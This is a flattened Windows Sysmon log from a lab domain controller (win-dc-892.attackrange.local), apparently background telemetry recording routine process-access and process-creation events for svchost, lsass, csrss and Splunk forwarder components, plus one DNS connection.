12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6487-6064-7600-00000000AE01}4528C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6487-6064-7600-00000000AE01}4528C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.798{266CAFBE-6487-6064-7600-00000000AE01}4528C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.721{266CAFBE-6489-6064-7800-00000000AE01}45884592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6489-6064-7800-00000000AE01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:13.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6489-6064-7800-00000000AE01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.565{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6489-6064-7800-00000000AE01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.566{266CAFBE-6489-6064-7800-00000000AE01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.483{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56610- 10341000x80000000000000003022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.049{266CAFBE-6488-6064-7700-00000000AE01}45564560C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.799{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
